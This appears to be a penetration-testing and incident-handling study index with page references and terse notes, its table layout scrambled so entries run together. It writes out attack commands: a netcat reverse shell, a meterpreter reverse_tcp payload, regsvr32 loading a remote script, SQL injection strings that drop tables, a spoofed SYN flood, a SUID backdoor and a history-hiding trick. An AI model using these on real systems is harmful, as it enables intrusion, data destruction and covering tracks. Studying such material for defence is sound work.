Ping swp,ARP scan,Connect scan,SYN,ACK,FIN,FTP Proxy"bounce
Nmap Scan types 2 93 attack",idle,udp,rpc
Nmap Traceroute Capability It "goes backwards".Sends pckt with right protocol to target,adjusts & determines
. TTL,decrements TLL
3 20 on Linux/Unix makes a process keep running even if the user who

nohup (no hang up) invoked it logs out. Listener keeps on listening.Reliable bkdr
5 95, 100, 102
Non persistent cookie located in memory.write js that lets you view&edit cookie.Use a proxy
4 144
modificatio in the middle
NOP 3 109, 119, 144 No operation, does nothing. But keeps the program running

subroutine called,function variables and return address ptr is stored in

Normal stack 3 99 stack.
Not notifyinging Law Why? Control issues and publicity, seizure of materials, business
1 24
Enforce:Preparation interuption
if related to PII, PHI, impact to 3rd party,publich health and safety you
Notifyinging Law Enforce 1 23 must notify
1 106
2
nslookup 24-26 nslookup windows, depreciated in some unix variants use dig or host
4 99-100 to get zone transfer info
6 29, 47
4 16, 19-22, 25, uses MD4,16 byte hash stored in SAM,if more than 14 chars no LM
NT hash 28, 39, 49-51 created.No salts
5 173
NTFS 5 104 Alternate data streams are supported in NTFS files
verifies the integrity of Ntoskrnl.exe before kernel is loaded in
NTLDR 5 57 memory
4 25, 30, 32, 39,

NTLMv1 49, 51
6 33
3 88, 91-92
NTLMv2 25, 30-32, 49,
4
51
Ntoskrnl.exe 5 57
Ollydbg debugger Unpacks windows Executables
Omnipeek (Airopeek) 2 64 Wireless specific sniffer
OSSEC 5 65, 67 General purpose system monitoring and analysis tool, has a feature
"Rootcheck" - rootkit detection capabilities
Open Web Application Security 89, 104, 110,
4
Project (OWASP) 150
Open ioc by Mandiant xml IOC's that define paths,names,hashes, execs,usernames etc indicating an attack
OpenPuff 5 149
OpenStego 5 149
1 121
OpenVAS
2 119 tool for vulnerability scanner (free)
Orion Live CD 1 104
Orkut 2 30
2 84, 95-96 Passive fingerprinting-sniffer that analyses packets gathered
OS fingerprinting
6 16, 31
OSPF-MD5 4 26
1 52, 105
Out-Of-Band (OOB)
2 53, 56-58
Outlook 4 24, 57, 63
osvdb.org open source vuln db 1 check for vulnerabilities in software
OWASP-Open Web App Security guide to building secure web apps/services,pen test
4 89
Project framework&checklist,WebGoat
P0F - Passive OS finger Printing determines system type, uses tcp,udp,icmp headers,ttl value and user string agent
tool
packet fragmentation 5 128, 162
Packet Storm 5 195
Packing pack exe so that it runs decompresses and then you get the main exec
Packing Defense 5 20 use right pluggins for Ollydbg debugger in Win
Packing tools 5 UPX,Yoda,Themida,Exe32pack,PECompact,PEBundle,Thinstall

PAM to enforce password Pluggeable authen module use in linux,can make users auth to
complexity policy in linux 4 41 RADIUS,kerberos..
Paros Web App Manipulation Proxy tool
Parser Problems - Buffer grabs data from ntwrk & parse to App.code parsing always
3 131
Overflow vuln.Eg.Wireshark,snort
Parser problems (file&protocol) 3 134 careful with sniffers(usually installed in DMZ,data centers etc)Patch!
Defense
steal hash,take adv of LM chal/resp or NTLMv1/2 across net and hash
Pass the hash Attack 4 49 gets passed
Pass the hash Attack 4 50 Steal hash, place in memory, use for SMB
Architechture
Pre:Patch,harden,endpoint sec,HIPS,SMB only via admin
Pass the hash Attack Defense 4 52 accs.Ide:config changes..
pshtoolkit,Windw credential editor(WCE);injects hash into LSASS,
Pass the hash Attack Tools 4 51 metasploit, psexec
Passive OS finger Printing Doesn't send pkts, rather just sniffs.eg surf the website & look at the header
Passive OS finger Printing Pre:close unused ports,stateful FW.Ide:not much cos its passive but u can use IDS sig
defences
2 73
get encrypted pass,get algorithm used,encrypt many dictionary pass
5-14, 22-24, 26- and compare
4 27, 31, 33, 40, audit,improve tech controls for pass complexity
password cracking 47, 49, 139 Pre:Disable LANMAN chal/resp; no LM hashes; policy (2 factor auth);
protect SAM,SYSKEY
5 170, 189
6 16
Password Cracking methods 4 10 Directory(word list),Brute force(iterating through caracter
sets),Hybrid(a mix of 2),Tools(Cain&Abel,John,Hashcat)
2 56 pretty slow.can trigger account lockout
3 157, 173 try small nr of pass on many acc's. avoid acc lockout
pasword guessing
4 4-8, 55 in windows:SAM database and AD.In linux: etc/shadow
6 16, 35
use fgdump,cain,meterpreter hashdump,sniff,linux boot
Password Hashes 4 29 cd,ntbackup.exe
2 159 SMB Lab: Invoke-LocalPasswordSpray -Password Winter2017
password spraying
4 7 try a few passwds on many acc's on many sys. avoid acc lockout
password storing 4 5 in windows:SAM database and AD.In linux: etc/shadow
Payload to ./msfpayload win/meterpreter/reverse_tcp LHOST=[IP] X > /tmp/meterpreter.exe
executable(msfpayload)
PEBundle 5 19
PECompact 5 19
PeepNtom 2 98
People Preparation/assesment Sptoolkit and phishme: tools to create phishing campaigns for
1 20
tool assesment
1 23
Personally Identifiable
Information (PII) 4 111
5 159
phishme 1 20 tools to create phishing campaigns for employee assesment
phpBB 2 42
Picasa 2 31
Ping of Death 4 154
ping sweep determine hosts that are up in a IP range

Pivot 3 118 uses a compromised system as a launch point for other targets (eg.
Port Forwarding)
Pluggable Authentication 4 40-41
Modules (PAM)
Point of contact and POC and command comm center,secure comm.permisson for
1 35
Resources(prep) resources 5-10K
Rmt-ctl backdoor,configure server,move exe to target,control with
Poison Ivy 5 9, 14-15, 18 client.Binary,C,py
Policy - Peer Notification est policy for outside peer not,partners,you company,employees,vpn
1 26
(Preparation) with warning
aproach to incident handling,secret or notify law enf.contain&clear or
Policy (Preparation) 1 22 watch&learn
3 119
polymorphic changes it's code base in a way that it continues to execute,evades AV
4 56, 62-65
5 151, 194 XOR the code then preappend it with XOR decoder.2. X+Y=X-(-Y)
2 25, 27, 93
port 53 3 16
5 162
Port knocking backdoor technique,sniffer grabs packts to specific ports it's interested in.
Port Reporter - by Microsoft 2 102 free tool that generates logs showing port activity
Prep:Close unused ports and apply filters,stateful FW,IDS.Ide:IDS
Port Scanners-Defenses 2 100 sig,log analysis
port sentry tools 1 53 Host perimeter Detection
Portspoof Makes all ports on machine appear open with services enabled,confusing attker
portmapper 2 93
positive skew analysis 1 140
2 40
PowerPoint
3 133, 139, 141
1 140-141
82, 142, 159-
2 160
PowerShell
142, 152, 161,
3 164-165, 168-
169
PowerShell Empire 2 142
People,policy,data,software/hdwr,communications,supplies,trans,spac
Preparation Overview 1 19 e,power,docs
1 25-26, 33, 35,

Pretty Good Privacy (PGP) 52, 163
2 13, 47
printf inserts arguments into user-defined
string of text, creating formated output
printf common misuse 3 right way:printf("%s",buffer); wrong way:printf(buffer);
2 148
Private VLANs (PVLANs) used to defend against Netcat Relays, isolates traffic to/from individual
3 26 sys
Priviledge escalation Rootkit modified version of chfn,chsh,passwd,su run with a password gets you
5 43
Linux root
netstat -nao | find "EST",tasklist /fi "pid or imagename eq [],
Process commands windows 3 165 tasklist /m
Process Explorer & Monitor 1 77 Process-analysis tool
Process Priority wmic process get name, priority
processes -unusual processes 1 247 ps aux, lsof -p [pid]

processes (linux) 1 226 ps aux, ps aux | less, top

Project Rainbow Crack 4 22
62, 202, 256,
1 266
Promiscuous mode 3 45, 132
4 24
5 52, 65
Promiscuous sniffing 3 45
atker can flood network with exploit and wait for someone to use a
Protocol Parser Buffer Overflow 3 132-133 protocol parser
Protocol Parser Defenses 3 134 patch sniff tools (wireshark, snort, tcpdump, NetMon)
Psexec on XP due to compatibility issues, run: set NTLM::UseNTLM2_session false
1 126
2 137
use(metasploit)> use exploit/wind../smb/psexec;set PAYLOAD
152, 155-157, win../meterpreter/reverse_tcp
psexec 3 159, 164, 166,
173 variables(metasploit)> set RHOST [IP], set LHOST [IP], set SMBUser [usr],
set SMBPass [pass], show options
4 51
6 51
pshtoolkit 4 51 tool for Pass-The-Hash (win); input is LANMAN hash
Encapsulates TCP inside ICMP echo req and resp.Features:client and
Ptunnel
5 124-125, 134 proxy
bomb traffic for 10 min, back off 1h, start again. ISP's can trace active
Pulsing Zombies 4 166 traffic; ASYNCRONIC
PUSH 2 25, 90 Data should be pushed through the TCP stack
Push Exploit Code into memory - exploit must be written specific to OS and architechture,target UID 0
3 106
Buffer and root SUID's
Pushpin - recon 2 31-32 Social media Geolocation(flickr,twitter,picasa etc)
208, 212, 214,

1 216-217, 222,
224, 229, 235,
pwd 239
3 33, 161
4 29, 31, 35, 47
6 50
4 35, 74 gets hashes
pwdump3
6 50
python simple webserver python -m "SimpleHTTPServer"; load a module that implements a simpl web serv
python to .exe convert 5 144 py2exe ; pyInjector ; pyinstaller
python2.7 vol.py -h. For
help:python2.7 vol.py [module] Volatility Invoke using python
-h
python2.7 vol.py dlllist -p [pid] -f
[path to mem_capture] Volatility DLL's and Command Line
--profile=(OS)
python2.7 vol.py timeliner -f
[path to mem_capture] Volatility Viewing Network Connections
--profile=[] | grep ESTABLISHED
python2.7 vol.py timeliner -f
[path to mem_capture] Volatility Viewing processes; displays a list of running processes at the time
--profile=WIN7SP0x86(OS)

Quick UDP Inernet Connection

(QUICK) 5 132 Possible Cvrt Chnl, multiplexed UDP connections for connections
RADIUS Shared Secrets 4 26
precalcultaing ecrypted/hashed passwds and storing in a table for
Rainbow Tables 4 22, 27, 139 comparisons
5 173
Ramen 4 57-58
2 54, 119 NeXpose - tool for vulnerability scanning(com)
Rapid7 WarVOX - tool for War dialing (free)
5 117 User Behavioral Analystcs - check behavior of an account
1 147-148, 150,
Real intelligence Threat Analytics 154-155, 158
(RITA) 3 128
5 68
Recon site 2 30 namechk.com..checks names on over 100 secial networking sites
Recon with search engines 2 35 GHDB(google hacking Database), bing, baidu etc
Recon-ng 2 31, 43 Target compromised accounts - recon
1 56, 95
16, 19, 22, 27,
2 35, 37, 40, 44, Casing the Joint
Reconnaissance
46, 48
6 22-23, 28, 30,
34, 37, 39, 44
10, 14, 17, 30,

1 32, 42, 103,
109, 114, 118, Restore Operations (Off hours), Monitor for backdoors, look for artifacts
123-126, 128 to come back
Recovery 2 58, 75
3 129
4 52, 74, 101,
111, 126, 151
5 69, 145
recover sys into prod in a safe manner. Validate your sys. Baseline.
Recovery Validation 1 123 Checklist.Test
Redline tool memory analysis of a compromised sys - analyze for indictions of compromise
bounces attack off servers.spoofed SYN to many servers,SYN_ACK
Reflected DDoS attacks 4 165 flooded to victim
Reg\\[MACHINE NAME] 1 126 Comand that even works remotely to check for changes to registry
reg quert 1 69, 85, 192
1 69, 85
regedit
4 50
Registration attack register similar domain names to fool users. Eg vvindowsupdate.com
regsvr32 &scrobj.dll 3 150 regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll invoke the script
on our behalf (not run it), can take extrnl USL loc for script
1 39, 110 capture and analyze mememory on Win
Rekall 22-27, 29, 31-
5 35
rel 1 208, 212, 222,
229, 235, 239
1 167
Relay

11, 15, 22-26,

3 28, 35, 40-43,
Relay
117
4 66, 73, 164
5 39
2 42, 98, 115
Remote Desktop Protoocol (RDP)
4 8, 55
1 83, 256
2 93, 109, 148
Remote Procedure Call (RPC)
3 17, 123, 131
5 37
Remux.py 2 99 Reverse multiplexor. Runs from Browser to scan Proxies. Learns
Educate users where to comunicate: publish a list of
Reporting Facilities(preparation) 1 36 indicators,email,phone,intranet. update mgmt, prepare war room
2 88
Reserved 4 19, 37
5 105, 128, 131
2 90, 94, 114
7, 96, 150-151,
RESET 4 176, 188
129-130, 178,
5 181, 184
Restrict Anonymous registy Key
Registry key values for ENUM and passwords
1 96, 132-133,
135
Respoder
4, 6, 51, 70, 73,
3 80-83, 88-89,
91-92
Retina 2 119 tools for vulnerability scanning (comm basis)
99-100, 102,
Return Pointer (RP) 3 105, 107-109, stack is very dynamic; difficult to find the exact location of the start of
119, 122-124 the executable code
Return-Oriented Programming 3
(ROP) 123
reverse shell surfs net asking cmds,atk send cmds as http
Reverse HTTP shell 5 122 resp.supports proxy auth
reverse shell 3 21, 28-29, 34,

113, 115
Reverse Shell defense 3 21 inspect web traffic at the IDS
Reverse WWW Shell 5 134
robots.txt 2 44 standard used by websites to communicate with webcrawlers and
other web robots; what areas not to process or scan
42, 118-119,
1 258
2 14
4 101
rootkit 6-7, 41-50, 52-
56, 58, 60-69, alters OS to keep access,hides logon,programs,files,processes from sys
5 71-73, 75, 79- admins
80, 82
6 17, 37-38

Rootkit Backdoor Components login,rshd,sshd,inetd&tcp services are all modified.Atker can give
(Linux) 5 44 passwd & get root.
chkrootkit(link count,Binary),Rootkit Hunter,OSSEC-Rootcheck,chk for
Rootkit Detection tools Linux 5 65 inconsisten
Sophos Anti-Rootkit, McAfee Rootkit Detective, Rootkit Revealer, file
Rootkit Detection tools Windows 5 66 integrity tools
load rootkit in a folder & run with admin,all files, proc,netwk
Rootkit hiding 5 47 associated are hidden
injects exp.dll to exp.exe then hooks to iexp.dll for code.All saved in
Rootkit Hooking in Action 5 48 system 32
Rootkit Hunter 5 65
Rootkit Platform 5 42 Linux:Linux Rootkit 4,LKR5,LKR6,Solaris,BSD,AIX,HP-UX,IRIX,Windows
60 installed via LKM,detects if 32/64 bit,alters lsmod and systrace output.

Rooty 5
creates 2 worlds(cone of silence).alters system calls.atker files hidden
61 from admin
Rose attack Sends a highly fragmented packet, writing the last fragment transmitted over and over
. again on thr network. CPU consumption, NOT packet flood.
Round-Robin DNS 4 71 Round-robin dns records with 3-10 min ttl populated with
proxies.double flux
alter return pointers so program executes existing libs from legit OS sys
Return-Oriented Programming 3 123 code instead of the atkr code for the exploit. Used to avoid DEP (Data
(ROP) Execution Prevention - Windows).
rpcclient -U[username] [IP]> Establish a SMB session using SAMBA's
137, 145, 150, rpcclient from Linux; enumdonuser,enumalsgroups,lsaenumsid,srvinfo
rpcclient etc
enumdomusers, enumalsgroups, lsaenumsid, lookupsids, srvinfo
2
153-155, 157, lookupnames administrators,queryaliasmem builtin 544(default
rpcclient - group membership 162 RID),lookupsids..
rpcclient - groups and server info 154 enumalsgroups domain, enumalsgroups builtin. Srvinfo
rpcclient -u test IP enum>enumerate target information by logging in, srvinfo, queryuser, lookupname test
2 74 screenshot example ; Similar to Rubber Duckie
Rubber Duckie
3 5,6 USB sticks with auto-keyboards, download-run malware,steal…
runas 1 90 /user:Administrator cmd.exe
S Tools embeds data in BMP files using LSB, result is identical
S Tools - Detection compare to color table,more number of duplicate colors,color histogram different
S-Mail 5 148 hides data in .exe and DLL files
SAINT 2 119 tool for vulnerability scanner (comm basis)
4 19-22, 28 random number used to seed the crypto algorithm.
salt
5 173
3 18, 162
SAM database 5, 16, 20, 25,
4 28-29, 31
1 31
70, 137, 144-
Samba 2 145
4 51
samba daemon (smdb) 2 137
searches google for vuln version of phpBB script then attacked sys
Santy worm 2 42 running it
Sasser 4 55, ,57-59

1 68, 83
sc query
2 102 sq query-list of serivices/ sc stop [service]-stop service windows
scanf 3 103
Scapy packet crafting tool to build packets - python
Scareware 5 16 form of malware which uses social engineering to cause shock
62, 73, 86-87,
Scheduked Tasks 1 253
schtasks 1 73, 87
SearchDiggity 2 43
runs searches across multiple networks to speed up finding of info
SECEVENTS.EVTX 5 114
Setiri Periodically, running on a victim mchine, surfs to the connection broker using an invisible
. browser. Through the personal/network firewall and anonymizer using HTTPS
1 89
scpol.msc 5 45
6 33
Search Directives 2 37 "link:","site:","intitle:","related:","info:"
Search engine recon - automated 2 43 Bishop Fox's digity,recon-ng(target compromised accounts)punkspider
check environment,request removal of indexed or cahced

Search engine recon - defenses 2 44 pages.robots.txt
"soc sec num" +xls -pdf. Pulls up excel sheets with social sec nr's,
Search Tips 2 38 withouth pdf's
site:www.[target].com asp/jsp/bak/cgi etc.Another method is with
Searching for file types 2 40 filetype: or ext:
ext:rdp rdp,"select a database to view",intitle:index.of "parent
Searching for vulnerable systems 2 42 directory"
Security event logs (eventquery) eventquery.vbs /L security
XP
Security event logs (wevtutil) wevtutil qe security /f:text > logs.txt
Win7
Security policy Log entry 1 89 secpol.msc; check for unusual entries in audit log
Secure Responses on Window BIND 4 & BIND 8 don’t filter there4 accept more info than asked.Use band 9
DNS(BIND)
Security Onion 5 68 Single best open source network forensic distribution
SECURITY.LOG 5 114
Sequence Number field 5 128-130
1 65-66
137-140, 142- outbound: net use \\[IP] /del ; net use * /del
2 148, 156-162 Inbound: net session \\[IP] /del
Server Message Block (SMB)
3 80, 92, 155, 173
4 30, 49-52, 57
6 36, 51
1 68, 83
services.msc
2 102
Session hijacking combines sniffing and spoofing.opt.1 at origin or dest opt.2 network based
Session hijacking Ack storms SQL nr gets out of sync due to the hijacking and victim keeps sending ACK msgs
Method to carry to browser: URL tracking, Hidden Form Elements nd
sessionID 4 143, 149 cookies
Session ID Hacking url trackin:modify inurl.HiddenFormEle:save&modify.cookies:close brow,save&mod
sessions -l 3 159
set LHOST, RHOST, SMBPass, 3 157 Configure Variables - set XXX example
SMBUser

set LHOST, RHOST, SMBPass,
SMBUser 6 51 set xxxx command list - Metasploit
Set-ExecutionPolicy 2 159
Set-NetAdapter 2 72
Shell History 5 86 ~/.bash_history
Shell Tips 1 207
119, 138, 147-
3
Shellcode 148
5 133
Shodan 2 41, 43, 50-51
shoveling shell (reverse shell 3 21, 115 Cli-Lis:on Lis: nc -l -p > [file].on Cli: nc [LisIP] [port] -e /bin/sh
back to attacker)
110, 114, 208, shutdow -h now (halt). shutdown -r now (shutdown and rebbot).
1 212, 222, 229, reboot
shutdown 235, 239, 244
5 79
SilentEye 5 149
Slapper 4 57 Meuly-exploit Worm
1 41, 43
Sleuth Kit
3 133
SlowLoris Attack issues series of slow partial HTTP requests.Apahce(not IIS) vuln.Not flooded.
SlowLoris Attack Defense Pre:Patch.Ide:IDS sign.Con:filter src add,loadbalan.Rec:block&reset HTTP deamon
buffer is overflowed,data placed in buffer overwrites return
Smashing the stack 3 100 pointer.exploit run
SMB evil sessions defense block ports at boundaries where not admin req TCP-UDP 445, TCP 135, 139, UDP
. 137,138
SMB protocol 2 138 L7 proto that implements file printer sharing,domain auth, rmt admin.
Pre:block inbound traffic between workstations,block null sessions

using reg keys
SMB session defense 2 147
Pre:on non admin and file shares block smb port 445&135-139.
Ide:check logs
net use \\[targetIP]; net use \\[targetIP]\[shareName]; net use \\
SMB session initiation 2 138 [targetIP] "" /u:""
smbclient 2 152 smbclient -L [winIP] -U [username]
smbclient -L [WinIPaddr] -U 2 144 Establish a SMB Session from Linux to Win; to pull list of shares
[Username] -p 445
smbcient //[WinIPaddr]/test -U Establish an interactive SMB Session from Linux to Win; activate cd, ls
[Username] -p 445 2 144 and get (FTP like)
Smurf Amplifier List powertexh.no/smurf,nmap -n -sP -PE -o Smurf '209.12.*.63,127,191,266
Smurf Amplifier Network that responds to directed broadcast message
Smurf Attack sends spoofed ICMP echo req(ping) to broadcast add.spoofed machine is flooded
Smurf defenses filter ICMP at gateway, allow for certain
Smurf defenses 2 ID: ping response other ICMP rest mess; Diff source IP on same LAN
filesnarf, mailsnarf, URLsnarf, Msgsnarf. Captures and saves to local
Snarfing 3 54 host
Sneaking forces a TELNET shell to be executed from an internal machine out to another machine
3 45-46
Sniffers 4 29
5 52
Sniffing and Session Hijacking Prep:Hardcode arp table,port security,dynamic arp inspection with DHCP
Defense Snooping,encrypted protocols (encrypted VPN, use SSHv2)
Sniffing and Session Hijacking
Defense 2 Iden:users loose session,messed up arp entries,dns cache,ssh client error msg

Sniffing and Session Hijacking

Defense 3 Cont:Drop sessions.Erad&Recovery:change passwords,rebuild systems
Sniffing Backdoor Defenses Pre:Keep atks off sys.Ide:look for weird traffic,proc &sniffers.ConEradRec:Backdoors;
. TLS1.2, hardcore ARP, SSHv2,Ipsec
Sniffing Backdoor Modes Promiscuous ; Non-Promiscuous
Sniffing Defenses Contain check other systems, remove shiffer prog, change pass, not prisc
Sniffing Defenses Indentif ifconfig, warning in browser,EtherARP, strange DNS query; arp -a/-e, look for arp
. manipulation, arpwatch, ipconfig /displaydns
Sniffing Passive & Active 3 44-68
Sniffit capture network traffic with GUI ; allow atkr to look at the data
run DNSspoof and webmitm/sshmitm,create tunnel with user &

Sniff SSL and SSH (Dsniff) 3 60 another from attacker to server. SSHmitm - substitutes the public key
snprintf syntax snprintf(dest_str,size_of_buffer,format_str,[user_input]);

1 13, 114
Snort
3 131, 134 protocol parser
snprintf
(dest_str,size_of_buffer,format_s Buffer Overflow vulnerable comment
tr.[user_input])
check file integrity,md5,sha-1.check pgp if available. test before you
Software distro site defences 2 13 deploy
sort "%x%x%x%x" in windows: writes contents of next memory location
source /opt/useruby193.sh diff versions of metasploit require diff vers of ruby. Metaspl 4.5.2 req ruby1.9.3
Source ports for scanning UDP 53,TCP 53 (Dns zone transfer),TCP 80 (most popular), TCP 443
Source Routing allows you to specify the path a source packet will take on the network
SPI Dynamics 4 146
Split DNS (DNS Def) 2 27 Extrnl name info in Extrnl srv;Intrnl name info in intrnl srv
sprintf 3 103
spurious sessions 3 86
Sptoolkit 1 20 tools to create phishing campaigns for employee assesment
103-111, 124,
4 128-141, 147, manipulate backend Database via input field
SQL injection (SQLi) 150
5 168-172, 174
SQL Injection Characters -- ; * _ or true 1=1 select join update
--(comment);(query terminator)*(wildcard)%match any
SQL Injection commands 4 105 string,OR,1=1,join,select
SQL Injection Defenses - SIEM log,Web App log,DLP finds data exfiltration.Con:Blk
4 111
Identification… IP&acc.Era:Remov att data
SQL Injection Defenses - limit Web app permision,split input code,filter input,accept only
4 110
Preparation alpha-num,<=&lt…
SQL Injection Example:Dropping Fred';drop table users;--(users table gets dropped,-- used to comment
4 107
Data out rest or /*
SQL Injection Example:Finding input Fred' in username,result in DB=Fred'' causes syntax error/DB
4 106
Error error/SQL error
SQL Injection Example:Get DB 4 109 Fred union select name,1,'1',1,'1' from master..systdatabase;--
structure
SQL Injection Example:Grabbing 4 108 ' or 1=1;-- in usrename field will return all users from the DB
Data
Nmap SQLInject.nse,ZAP proxy,Burp Suite,SQLmap,Havij
SQL Injection Vulnerabilities 4 104 find input that is part if DB.Eg username,add string quotation,bypass
tools
filtering

SQL Parameterized stored prepared SQL code that you can save, so the code can be reused over and over again.
procedure in the web app SELECT FROM WHERE AND
1 96
SQL Slammer
4 55
SQLInject.nse 4 104
sqlmap 4 104
1 256
sshd 4 185-186, 188 .
5 43, 50
SSHmitm 3 63
SSID cloaking 2 60-61
2 68
SSLStrip
3 51, 67-68 strips the SSL from HTTPS; makes HTTP traffic look loke HTTPS
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce &
startup items (Windows) 1 69, 70, 86 RunOnceEX or wmic startup list full or C:/>dir /s /b
"C:Doc&settings[userName]\start Menu\" or msconfig.exe
start C:\tmp\test.txt:nc.exe 5 110 Executable in Alternative Data Stream
Stash (Stego) 5 148 Hides data in a veriety of image formats
Statically-linked binary a self-containment program that needs no external library
Steganography 5 147-156 Concealing data behind images,word,txt,CGI,JPEG
Steganography - How it works require host file,host can be genrated,hidden msg generates a file/hides in a file
Steganography - Generate new hidden msg can gen new file.used in CGI's.Eg input text used to gen fractals
file
Steganography - Types Injection, substitution(can lower quality of resulting file) and Generate a new file
Pre:learn stego tools,integrity check on webserver files.Ide:compare
Steganography Defenses 5 155 with original,hash
Ide:with HR&legal,involves monitoring victim&comparing to orig
Steganography Defenses 2 5 156 img.Con...:HR,legal
Steganography Defenses 3 use stegdetect
Steganography Example (Image - use substitution to change LSB with minimal impact in pixel color to human eye
LSB)
detects data hidden with Jsteg,Jphide,Invisible
Stegdetect 5 156 Secrets,Outguess,F5,Appendix..
Jsteg,MP3Stego,S-Mail(hide data in exe&dll),Invisible secrets(in
Stego Tools 5 148-149 ads),Hydayn:win,lin
Stego Vs Crypto Crypto:u know the data is being sent but can read it.Stego:u don’t know data is sent
StegExpose 5 154 Java utility detects stego lissless images LSB techniques
Strcpy 3 96, 103, 107
Stream Control Transmission Possible Cvrt Chnl, multiplexed and multi-streaming,sends data via
Protocol (SCTP) 5 132
multiple connections,multihoming,has built in C2 serv failover
Streams 5 106 tool for ADS, can delete streams, microsoft sysinternals
strncpy 3 96, 103, 107
8, 26, 55, 103-
111, 124, 128-
4 130, 136-137,
Structured Query Language (SQL) 141, 147, 150
64, 168-172,
5 174
3 65, 146
Stuxnet 4 55, 57-59, 64
5 55
causes CPU's instruction ptr to jump to a new location in memory to
Subroutines 3 98 run code

like Dsniff but nice GUI, can hijack also, can strip ssl or downgrade
Subterfuge 3 64 http,block VPN
Substitution (stego) data in host is subed with hidden msg.can lead to degrade.replace insignificant data
SubVert 5 58 VM based rootkit proof of concept
SucKIT 5 56, 65
sumfuq 5 50 originator of the Kernel-Mode rootkit
Supervisory Control And Data 3 11
Acquisition (SCADA) 4 58, 64
chkrootkit=check anomalies in rootkits,tripwire/AIDE integrity
supporting tools (linux) 1 258 chcker;fingerp files
Suterusu 5 71-74
1 249, 261
Switch User ID (SUID)
3 106
1 54 [S] - SYN ; [S.] - SYN/ACK ; [.] - ACK
2 25, 90, 93-95 Scan types; Half-open connection
3 36, 38 Firewalls can block invoming SYN's
SYN 154, 165, 167,
4 171, 175, 179-
180, 185-186
5 129-130 Covert_TCP modes
2 25, 90, 93-94
SYN-ACK
4 165, 185
SYN-flood 4 180 hping --syn --count 20 --spoof 10.10.11.11 -p 445 [target_machine
SYN Flood - Defenses 4 Pre: Linux Syn Cookies:ISNb=hash of secret nr,src IP&port,dest_ip&port+ISNa+time
SYN Flood - Exhausting Resources syn and don’t send ack,tie up all cons/use all bandwith,use unresponsive spoofed IP
SYS_execve 5 51, 53, 55
1 69, 77, 126, 141
Sysinternals
2 137
5 66, 106
3 162
SYSKEY
4 31 provides extra 128-bit encrytion of SAM db when stored in Registry
syslog 5 44, 85, 117-118

2 104, 126, 135
systemctl
4 185-186, 188
show all input field currently viewed,default and empty
Tamper Data 4 144 values.manipulate http req
1 236 xvf X-extract V-verbose F-from file xvfz Z-unzip first before opening
tar file
5 94, 99 Lab:Shell History
tar / untar. Archives and 1 236 tar cvf ,tar xvf, tar cvfz, tar xvfz
compression
Taranis 3 acts like macof;sends eth frames to trick switch thich 1 MAC is simultan on 2 ports
1 81-83, 126
164-165, 167,
3 169, 173
Task Manager (tasklist)
4 177-178
5 27, 35
Tasklist | find /I /c "notepad.exe" 4 178 count the nr of processes named notepad.exe

Tasklist cmd can be run remotely 1 126 by psexec from Microsoft Systinternals. Ps in Linux
TCP 139 2 148 NetBIOS Session Service
TCP 22 4 185 SSH
2 89 SMB
TCP 445
4 179 SMB is always listening
TCP 5500 5 12 VNC listenin mode: server sends GUI via 5500 to client
TCP 5800 5 12 serves up a JAVA applet of a VNC viewer
TCP 5900 5 12 VNC active mode: server listening on TCP 5900 by default
TCP 6667 (IRC to control Bots 4 68 Bots can be controlled with IRC; one-to-many comm
TCP 80 2 89 Web Server HTTP
TCP and UDP ports 2 89 65536 for TCP and the same for UDP; TCP-tries to deliver messager;
UDP-mess may dropp
TCP control bits and 3 way
2 90 SYN,ACK,FIN,RESET,URG,PUSH
Handshake
1 54, 266 -nn 'port 27917' ; host10.10.75.1 & -> :LOG output
2 25,106 atkrs find conn systems by dumping DNS record; -i lo
Tcpdump ./tcpdump -n -s0 -w init.out port 80 & (-s0 Snap lengh unlimited, size
5 101, 141 of the packet to capture) tcpdump -I lo
-s0 -A host 10.10.75.1 | grep VIEWSTATE (-A include the ASCII from the
dump)
TCP header 2 91 src port, dest port, sequence nr, Ack nr, control bits
sends spoofed reser to both sides to kill connections,forcing re-
TcpKill 3 53 auth,grab auth
sends packets to slow down conversation so attacker can sniif in fast
TcpNice 3 53 connection
1 77 TCP & UDP
TCPView 2 101 Shows CURRENT traffic - GUI,; non-GUI version is TCPVcon
shows all TCP and UDP endpoints on Windows systems
tcptraceroute and Layer Four send pkts through a pkt filter device to determine which ports are
2 124
Traceroute open
computer&physical security,operations, Network Mgmt,Legal,HR,DR
Team (preparation) 1 30 etc
Define the IH team-onsite techies,comand post. Establish response
Team Organization 1 32 time baseline
Tardrop 4 154, 161 strangely fragmented packets that cause Dos
1 121
Tenable
2 119-120, 123
Ticketing tools 1 104 RTIR,CyberSPonse,Orion Live CD
Time Exceeded 2 83, 85
Tiny Fragment Attack first frag is tiny and carries part of offending traffic, second packet carries the rest
2 80, 84
Topology
6 32, 48
Traceroute How it works LINUX;1st pck with TTL=1,router decrements to 0 and send TTL
2 83
traditionally exceeded.2nd pck TTL=2
plan, set up tools,deploy honeypots,forensics image in multiple
Train the team 1 37 ways,unannounced pen test
2 46-47
transform
5 50, 148
1 193, 258
Tripwire
5 7, 50, 67
Truly Nasty Payload - Worms 4 64 Breeders consuming resource.Steals info fro sys.distribute bots.
Truman Analyze Malware-isolated env

Trust Relationships must be monitored to ensure not-exploited. During CONTAINMENT process.

Tunneling 5 120, 127
Carrying a protocol over another. IP over IP, X-windows over SSH,
Tunneling and Covert Channels 5 120 IPoCP etc
Type C:\tools\nc.exe > 5 110 Executable in Alternate Data Streams
C:\tmp\test.txt:nc.exe
Type hackstuff.exe > 5 104 hide files in a stream behind normal files
notepad.exe:stream.exe
2 89, 92 Src port, dest port, msg length, chsum
UDP Header
5 128
uname -a 5 98 kernel version of the system
1 11, 21,175
166-172, user abuses normal access. eg. Email problems and inappropriate web
Unauthorized use surfing
eg. unlink /tmp/backdoor. lsof +L1 (shows files with a link count less
unlinked files 1 250, 262 than 1
unset HISTFILE then kill -9 $$ 5 87 change environment variable to hide shell hist
find / -nouser -print (files may be left by attacker,deletes user but
Unusual accounts(no owner files) 1 255 leaves files)
Unusual accounts(rooty Sort –nk3 –t: /etc/passwd | less (uid=0) or better grep :0: /etc/passwd
1 254
privileges) (uid/gid=0)
unusual cpu,memory and disk 1 257 uptime, free, df
usuage
unusual files (redhat pkg mngr rpm -Va.Changes to all inst pkgs.check size, MD5,
1 251
tool) permissions,type,owner,group
eg. Create sh backdoor.cd /tmp,cp /bin/sh /tmp/backd,chmod 4111
unusual files (suid root) x->s 1 261 /tmp/backd
unusual files (suid, large,dot and find / -uid 0 -perm -4000 -print, find / -size +10M -print, find / -name "
